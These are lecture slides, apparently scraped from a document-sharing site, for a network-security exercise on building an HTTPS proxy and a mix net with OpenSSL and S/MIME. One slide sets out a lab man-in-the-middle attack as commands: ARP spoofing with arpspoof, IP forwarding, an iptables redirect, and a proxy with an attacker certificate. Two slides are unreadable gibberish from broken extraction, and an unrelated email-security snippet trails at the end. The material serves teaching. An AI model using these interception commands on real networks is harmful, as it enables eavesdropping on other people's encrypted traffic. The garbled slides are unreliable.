NetSec Exercise 8 Communication Mixes

Size: px

Start display at page:

Download "NetSec Exercise 8 Communication Mixes"

Jean Watson
8 years ago
Views:

1 NetSec Exercise 8 Communication Mixes Thomas Schneider Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany Thomas Schneider: NetSec Exercise 8 Communication Mixes 1 / 22

2 Exercise HTTPS Proxy (wproxy) wproxy = wserver + wclient: 1 incoming SSL connection from client: initialize_ctx(proxykey,proxycert), tcp_listen, while(1): accept, fork, SSL_accept 2 new SSL connection to server: initialize_ctx, tcp_connect, SSL_connect 3 read GET request from client, to stdout and server: while(1): BIO_gets(client buf), fwrite(buf stdout), SSL_write(buf server), blank line break 4 read HTTP response from server, to stdout and client: while(1): SSL_read(server buf), if(ssl_get_error()==ssl_error_zero_return) break, fwrite(buf stdout), SSL_write(buf client) 5 shutdown SSL and TCP connections for client and server: SSL_shutdown, close Thomas Schneider: NetSec Exercise 8 Communication Mixes 2 / 22

3 Practical Attack: ARP-Spoofing + HTTPS Proxy Client Server wclient -h proxyip -p v wserver SSL Proxy (Attacker) SSL IP: serverip Port: 4433 IP: proxyip Port: 4444 Exercise 7, 5f: wproxy -p i serverip -c attackcert.pem arpspoof -i eth1 -t <IP_Client> <IP_Server> arpspoof -i eth1 -t <IP_Server> <IP_Client> ssh -Y <host> ssh -Y <host> ssh -Y <host> echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -i eth1 \ -p tcp --dport j REDIRECT \ --to-port 4433 wproxy -p i <IP_Server> \ -c attackcert.pem Port X X X.254 Port 2 Port 19 VLAN 400X Thomas Schneider: NetSec Exercise 8 Communication Mixes 4 / 22

4 &9$847)58:#;!!"##$%&'()&"%*#&+,-.! F4G)67$G9&#9CH#)#598H) &455678&9$847! I)#&+ " K$)C6FF#G;)87&4587L)5#;;9L#;)?=8&=)9G#)9;D55#$G8&9HHD)#7&GD>$#A);4) $=9$)47HD)$=#)58:)&97)A#&GD>$)$=#5 " K$)&=97L#;)$=#)M9>>#9G97&#N)4F)5#;;9L#;)CD)A#&GD>$87L)$=#5 " K$)&=97L#;)$=#)4GA#G)4F)5#;;9L#;)97A)G#H9D;)$=#5)87)C9$&=#;) " %#&6G8$D)&97)C#)87&G#9;#A)CD)&9;&9A87L)58:#;! " I! S0J TG 0 (TG + ()TG 1 ()5U VWR U VWS+ U VWS0 " S0! S+J TG + ()TG 1 ()5U VWR U VWS+ " S+! RJ TG 1 ()5U VWR " K$)8;)85>4G$97$()$=9$)$=#)58:#;)>G4&#;;)M#746L=N)5#;;9L#;!"#$%#&'()*%)+,,-.+,,/ 012/ Thomas Schneider: NetSec Exercise 8 Communication Mixes 5 / 22

5 &:$958)69;#< =0()B=1()B=?()B=+()B=>()BA#<$()B=#<<:C#D EFA D EF=> D EF=+ D EF=? D EF=1 D EF=0 %57@&# =0 =? =1 =+ => A#<$!"#$%#&'()*%)+,,-.+,,/ 0123 Thomas Schneider: NetSec Exercise 8 Communication Mixes 6 / 22

6 Exercise MixNet Implement mixnode and mixclient for a mix net OpenSSL for digital signatures and asymmetric encryption Messages encoded with S/MIME To: header contains hostname of next mix. Mixes are connected via plain TCP/IP port 4444 (no SSL) Use private key (groupkey.pem) and certificate (groupcert.pem) of your group certificates for decrypting messages sent to your mixnode Thomas Schneider: NetSec Exercise 8 Communication Mixes 7 / 22

7 S/MIME (Secure/Multipurpose Internet Mail Extens.) Standard for public key encryption and signing of messages ( ) MIME defines how the body of a mail is structured S/MIME signs/encrypts body of messages (not header) S/MIME encrypted message body format MIME-Version: 1.0 Content-Disposition: attachment; filename="smime.p7m" Content-Type: application/x-pkcs7-mime; smime-type=\ enveloped-data; name="smime.p7m" Content-Transfer-Encoding: base64 MIIJMgYJKoZIhvcNAQcDoIIJIzC... Thomas Schneider: NetSec Exercise 8 Communication Mixes 9 / 22

8 S/MIME signed message body format MIME-Version: 1.0 Content-Type: multipart/signed; protocol=\ "application/x-pkcs7-signature"; micalg=sha1; \ boundary="----92b858ac09e cc2e727df4db73" This is an S/MIME signed message B858AC09E CC2E727DF4DB73 Message Text B858AC09E CC2E727DF4DB73 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIINbAYJKoZIhvcNAQcCoI B858AC09E CC2E727DF4DB73-- Thomas Schneider: NetSec Exercise 8 Communication Mixes 11 / 22

9 S/MIME with OpenSSL S/MIME support in OpenSSL (man smime): Sign: openssl smime -sign -in message.txt \ -inkey signkey.pem -signer signcert.pem \ > signed_message.txt Encrypt: openssl smime -encrypt -aes128 \ -in message.txt -to hostname_of_receiver \ receivercert.pem > encrypted_message.txt Sign+Encrypt: First sign, then encrypt openssl smime -sign... \ openssl smime -encrypt... \ (no -in parameter) > sign_enc_message.txt Thomas Schneider: NetSec Exercise 8 Communication Mixes 13 / 22

10 Prepare Mix message Prepare message m to be sent from A to B via M1 and M2: openssl smime -sign -in m.txt \ -inkey Akey.pem -signer Acert.pem \ openssl smime -encrypt -aes128 \ -to B_hostname Bcert.pem \ openssl smime -encrypt -aes128 \ -to M2_hostname M2cert.pem \ openssl smime -encrypt -aes128 \ -to M1_hostname M1cert.pem \ > mix_message.txt cat mix_message.txt To: M1_hostname MIME-Version: Thomas Schneider: NetSec Exercise 8 Communication Mixes 15 / 22

11 Mixclient mixclient reads mixed message from stdin and delivers it to the first hostname (To:...) via TCP/IP port 4444: A>./mixclient < mix_message.txt Delivering message to M1_hostname Thomas Schneider: NetSec Exercise 8 Communication Mixes 17 / 22

12 Mixnode mixnode receives messages on TCP/IP port 4444, decrypts them with its groupkey.pem and groupcert.pem. Afterwards it checks, if another To:... is given in the decrypted message: YES, To: given: Deliver decrypted message to next mix given after To: via TCP/IP port 4444 M1>./mixnode Enter PEM pass phrase: Listening for incoming connections. --- Starting to process message from IP_A... Decrypting message... Delivering message to HOSTNAME_M2 Message processed. Thomas Schneider: NetSec Exercise 8 Communication Mixes 19 / 22

13 NO To: : Check if signature of sender is OK (certificate path to NetSecCA rootcert.pem) and output message B>./mixnode Enter PEM pass phrase: Listening for incoming connections. --- Starting to process message from IP_M3... Decrypting message... Verifying signature... Message from /C=DE/ST=Bavaria/L=Erlangen/O=FAU /OU=CS 7 / NetSec/CN=NetSec CA/ Address= Message Text Message processed. Thomas Schneider: NetSec Exercise 8 Communication Mixes 21 / 22

14 OpenSSL Coding Hints Load private key from file: PEM_read_PrivateKey Load X509 certificate from file: PEM_read_X509 Load root certificate from file: X509_STORE_new, X509_STORE_set_verify_cb_func(store,NULL), X509_STORE_add_lookup(store,X509_LOOKUP_file()), X509_LOOKUP_load_file(lookup, rootcert.pem,...) Show IP address of TCP connection: accept, inet_ntop Decrypt message: BIO_new_mem_buf, SMIME_read_PKCS7, bio_decrypted=bio_new(bio_s_mem()), PKCS7_decrypt Deliver to next mix ( To: ): BIO_gets, BIO_get_mem_data Check signature and show message (No To: ): SMIME_read_PKCS7, PKCS7_verify, PKCS7_get0_signers, sk_x509_value, X509_NAME_oneline Thomas Schneider: NetSec Exercise 8 Communication Mixes 22 / 22

Electronic mail security. MHS (Message Handling System)

Electronic mail security. MHS (Message Handling System) Electronic mail security Diana Berbecaru < diana.berbecaru @ polito.it> Politecnico di Torino Dip. Automatica e Informatica MHS (Message Handling System) MS MS MUA MUA (Message Transfer ) MS (Message Store)